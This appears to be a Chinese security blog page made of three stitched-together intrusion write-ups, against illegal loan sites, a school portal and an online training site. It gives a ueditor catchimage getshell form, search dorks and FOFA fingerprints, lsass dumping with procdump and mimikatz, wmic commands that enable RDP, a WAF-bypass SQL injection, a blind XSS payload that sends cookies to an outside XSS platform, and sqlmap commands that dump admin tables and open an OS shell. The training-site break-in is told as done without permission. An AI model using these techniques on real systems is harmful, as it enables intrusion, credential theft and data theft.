ANONYMOUS 发布的文章

714高炮指那些期限为7天或14天的高利息网络贷款,其包含高额的“砍头息”及“逾期费用”。714高炮基本上90%都是以7天期为主。利息方面年化利率基本上都超过了1500%

说明

以借贷为业的民间借贷合同无效,意味着所有714、小高炮、借条等网络高利贷,合同都是无效的,借款人就算逾期,就算不还款,因为合同无效,放贷人也无法起诉到法院。这对遭遇网络高利贷暴力催收的人来说,无疑是一个福音:既然你爆我通讯录,我就是不还款,有本事你去告呗?反正法院也不支持你!

调查

经过长期的摸排经验累积主要有以下几个部分组成

放款人(有经济实力雄厚的大佬) - 借贷人 公司(有经营牌照的 比如某信)- 渠道(推广 或者是 贷超平台) - 借贷人

代理商负责推广 - 每个新开客户(10-14)(14-18元)不等,如果客户申请贷款通过还有额外的红利可以拿,据我所知,做代理的几乎每天除去成本都可以赚几千。至于信息数据的来源就有待考究了。

这其中还涉及到前期的审核,例如收集通讯录,实时记载短信记录,以及后期的催收。暴力催收等违法行为。

漏洞合集

1.首先感谢各位大佬公布的漏洞 TP5 GETSHELL 以及 .NET 框架ueditor的漏洞 让在下搞了不少东西。
GOOGLE关键词一:- 新用户注册. 登录提现 inurl:/account/login

1.png

2.png

.NET ASPX ueditor1.4.3漏洞 主要漏洞出现在编辑器漏洞,在/Content/ueditor/ 存在百度编辑器的漏洞,无任何的补丁可以直接上传。

3.png

但是迄今为止,也就三天左右的时间已经大部分修复,应该是同一伙人或一个人搭建的站点。总站点统计有一百多个,权限几乎都掉完了。可见其中利润之大。

2.关键词: 立即 inurl:/register/channel/

4.png

此开发为TP5.0框架,直接进行POST写shell

5.png

borrow_amount = 借款金额
borrow_days = 借款天数
borrow_rate = 利率
overdue_rate = 逾期利率
collection_rate = 催收服务费费率(借款金额x%催收天数)
verify_fee = 信息认证费
insurance_fee = 保险服务费
interest_fee = 借款利息
borrow_servcie_fee = 借款手续费
account_manage_fee = 账户管理费
truely_amount = 实际到账金额
total_fee = 服务总费用
例如:
借款2000元,扣除总费用600,剩余1400,如此高额的手续费。

现在来说下继714之后新的玩法

在前段时间,摸索高利贷平台.发现了某系统。

6.png

这是一套基于UI框架二开的后台管理程序,结合了商城,H5推广,管理,具体的源码之前在GITHUB找到了,未保存。

7.png

所见即所得,通过查询特征发现一群网站,所搜集的通讯录号码有千万,涉及百万借贷人。管理也是人才,有钱,阿里开了五十多台服务器。

说明

对比之前的714是直接收取手续费用,现在的714是通过手机评估,以及购买手机收取手续费用.举个例子,你需要借款,必须购买手机,手机为一千元,你需要支付400元的鉴定费用,才可以拿到1000元的借款,变相的还是付出了400的利息。其本质还是高利贷。

根据网上的漏洞利用

<form action="http://xx/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded"  method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>

通过对SHELL的比对,我得到了以下所有的信息
以47.xxx.xx.xx开头管理员总计开了大概有50台服务器作为高利贷推广放贷。

8.png

相同的框架相同的数据库密码,简称真香。。

结语

抛砖引玉,小弟放几个关键词容各位看官自由发挥。

GOOGLE
inurl:index/login/register.html 币 (区块链传销)
inurl:/index/login/respass.html 国际 (非法集资)
inurl:/loan/read/id/ (714借款)

FOFA
/static/index/js/lk/order.js (非法集资)
"/jslib-base/jquery-1.8.3.js" (贷后管理)
"/dev/static/index.css" (贷后管理)
"/css/ServerPage.css" (羔羊贷)

信息收集

渗透的本质=信息收集?随着实践的次数增多,慢慢发现信息收集的重要性,当掌握的信息越多,目标暴露的弱点也会越多,下一步进攻的突破口越明显。

浏览了目标的很多功能,没有发现可以操作的点,因此尝试登录以发现新的功能点寻找突破口。

1.png

该平台的默认账号密码为学号和身份证号后六位(也是大部分高校的惯性行为)。因此接下来就是收集学生的学号以及身份证号,学号比较好收集(谷歌语法一般都会找到很多),但是身份证号并不常见。但是我在另一个子域名的平台发现了两处不起眼的越权。

注: 目标网站是本人所在学校网站,且本人取得测试授权。虽然账号密码用自己的即可,但是作为一个攻击者,我就当从零开始。

2.png

直接访问该子域名的admin目录,发现可以越权访问,并在消费统计处查看到了大量学生学号等信息。接下来在此网站找到了第二处越权,可以查看任意学号/工号人员消费明细,且明细中包含身份证号码。(本来是觉着可以搞这个网站却发现后台其他功能报废了。。前台点了点各个功能才发现了这个越权)

3.png

拿到所需信息,登录目标平台。

4.png

Bypass && Getshell

登录发现没有权限访问个人中心?。。

5.png

普通学生用户只有发表留言的权限,调用的是简化魔改版ueditor编辑器,尝试了一下没有可利用漏洞。但是在抓包测试上传的时候仔细看了一下cookie,发现了有意思的东西。

6.png

在查看服务平台的相关管理人员回复的时候发现了账号为admin的回复。因此直接将参数值改为admin,直接成功越权到admin用户。

7.png

头像处可以上传,但是直接上传会被某waf拦截,不太清楚是什么waf,[email protected]

8.png

9.png

起初传了asp,发现访问返回404,好奇又传了php,结果也是404。最后发现只允许上传解析aspx文件 :)

10.png

登录远程服务器

已经是system权限了,肯定要登录到服务器看一眼,虽然没必要但是可以。

tasklist /svc

发现服务器3389没有开启,另外发现了360及安全狗进程。利用procdump+Mimikatz来读取windows明文密码。

由于prodump.exe是微软系统自带,有微软的签名证书,所以杀软不会拦截。
# lsass.dmp保存至当前目录
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
# 脱回本地,猕猴桃(mimikatz)读取明文密码
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

11.png

windows 2008 开启3389

wmic /namespace:\rootcimv2terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
wmic /namespace:\rootcimv2terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

12.png

服务器在外网直接登录,结果发现:

13.png

折腾了半天还是不让我登录是吧,爷今天非要登录进去看一看!

开始我以为管理员在线,不能同时登录两个账号或者管理员把我踢了。后来@X1r0z提醒发现可能是安全狗的问题。将安全狗配置文件下载到本地查看,发现设置了白名单访问控制。

# 安全狗配置文件所在目录
C:\Program Files\SafeDog\SafeDogServer\SafeDogGuardCenter\ProGuardData.ini
C:\Program Files(x86)\SafeDog\SafeDogServer\SafeDogGuardCenter\ProGuardData.ini

14.png

虚拟机更改计算机为白名单内容项,登录。

15.png

单独的一台服务器没有内网,就到此为止了。

写在后面

那个不知道什么名字的waf,在最近测试其他目标的时候又遇到了,且可以bypass它的SQL注入防护。

# 经过测试发现在部分查询语句的时候拦截了substr 以及 or/and等。
# 绕过(我测试的目标是盲注,其他的注入方式可以自测,好像防护规则有点弱智)
?id=1' ^ (ascii(mid((select * from * ),1,1))>0)#

一、起因

当我在家葛优躺之时,我亲爱的妈妈忽然给我来了一波夺命连环call。

大概内容如下:

–妈妈:儿~呀。。。你印布隐私(认不认识)搞公务员培训的机构,帮我在网上瞅瞅去,我有个朋友他儿想考公务员~

–我:(声音笑嘻嘻,心里mmp)哎呀,这个bia的天,搁家里睡觉行了。。别弄了。。

–妈妈:MLGB,叫你整,你就快点的,晚上给我回电话。

哎,父母之命不可违,悲伤的我只能放下手里的手机,开始去百度上找培训机构。

1.png

百度上面找了好久,都没找到太合适的。问了问身边的朋友:朋友给了一家网校的报名地址

http://www.xxx.com/3g/xxx/2203947.htm

2.png

没错,还带免费试学。。。真的先进。。。。

然而作为一名做培训的职业小学生,怎么肯轻信这种网校的培训质量?于是打开爱站查了一波权重。。。

3.png

这尼玛???百度权6,emmm,有点意思。见到这么高权重的站,那时我已饥渴难耐,便决定对此站点来一波渗透测试。

二、XSS盲打?安排一下

4.png

看到这里,小伙伴们肯定想。。。emm,发挥有框就插的精神,是不是可以XSS打一下试试呢?(所谓盲打说白了就是在不知道输入的信息在后台的输出位置的情况下使用XSS利用代码进行渗透测试) 说干咱就干。。。接下来就插入xss payload试试吧。。。

Payload: </textarea><script src=”=”http://xsspt.com/z6ocdy?1531815744″></script>

将payload完整黏贴进去,如图发现仅有</tex 这四个字符

5.png

审查元素看下,在表单处理上设置了maxlength,直接审查元素大法改掉就好了

6.png

把maxlength编辑为9

7.png

然后我们的XSS Payload就可以正常地全部输入到表单中了

8.png

手机那个文本框,我随便填了11位数字,然后点击提交,万幸的的是提交成功了(后端没对内容进行验证)

过了大概1个小时,突然XSS平台的邮件来了,兴奋ing。。。(客服是真的敬业)

9.png

拿着cookie,傻啦吧唧地就是进入后台一波浏览,发现权限非常小,基本上只能处理处理客服工作

10.png

不过可以查看后台的管理员账号。。。。。(果然是个大站,后台分工权限这么讲究。。。)

11.png

12.png

看着这么多的超级管理员账号,而我却只是个吊毛客服,基本上没什么权限,心里真的难受的一批。。

难道我们的渗透到这里就要结束??不可能,这显然不符合本屌的风格。。。

13.png

于是我又仔细地翻了翻后台,看看有没有地方可以来一波骚操作。。。

三、后台SQL注入?讲究

14.png

大家可以看到我们的客服处理界面是可以进行查询的,查询的过程是通过GET方式传导一个mobile参数实现查询

我们直接测试一下SQL注入的Payload,看看是否存在注入。发现页面没有返回信息,那么就很有可能存在SQL注入。

15.png

我们使用BurpSuite来抓取本出的的HTTP请求,然后保存在C:UsersSamsung 700Z5CDesktop1.txt中

16.png

接下来到了以小勃大,紧张刺激的时刻,掏出大宝贝,使用SQLMAP的 -r参数,注入本HTTP请求

命令为sqlmap -r C:UsersSamsung 700Z5CDesktop1.txt

17.png

wow,wow~注入成功了。哈哈哈。。。。我们开始直奔管理员的表

命令为sqlmap -r C:UsersSamsung 700Z5CDesktop1.txt –tables -D “nd_net” //列出nd_net数据库的表。

18.png

然后执行

sqlmap -r C:UsersSamsung 700Z5CDesktop1.txt –columns -T “net_admin_user” -D “nd_net” //列出net_admin_user表的字段

最后执行命令

sqlmap.py -r “I:T00l1.txt” –dump -C “id,nd_user,userid,nd_pass” -T “net_admin_user” -D “nd_net” –threads=10

//导出net_admin_user表中id,nd_user,userid,nd_pass几个字段的数据

19.png

全部是md5加密,拿到cmd5,一波解密,成功获取到所有管理员的账号密码,然后成功登陆以管理员的权限登陆后台

20.png

哈哈,讲究!

四、不拿Shell,与咸鱼有什么区别?

emm,就算是管理员的权限。我发现可以利用的地方依然很少,只有一些静态页面的编辑权限(而且编辑器是KindEditor,没什么方法上传拿Shell),我当时十分绝望。。。但是我发现了这个——数据库备份。

21.png

点击后,跳转到一款叫做“帝国备份王”的程序

22.png

随后,我便去该程序的官网,下载了一个帮助文档。使用默认用户admin/123456进行登陆,但是以失败告终。

但我怎末可能放弃,我一个一个测试了之前后台SQL注入得到的密码(有验证码,没法爆破的),最终在一个密码上成功地登陆了。。。我靠,高兴死我。

23.png

发现了一个PHP探针

24.png

再掏出SQLMAP,直接使用命令 sqlmap -r C:UsersSamsung 700Z5CDesktop1.txt –os-shell //获取shell

25.png

输入我们通过探针得到的路径,很幸运,ROOT权限直接os-shell成功。直接上一句话,GetShell完美结束

26.png

五、总结

本次渗透测试,虽然没有骚操作,但是总体来说用到了许多知识,现进行总结

1.XSS盲打技术
2.SQLMAP注入HTTP响应包的语法
3.人性的弱点分析(多个程序用同一个管理密码)
4.从获取绝对路径到SQLMAP获取shell
5.审查元素小技巧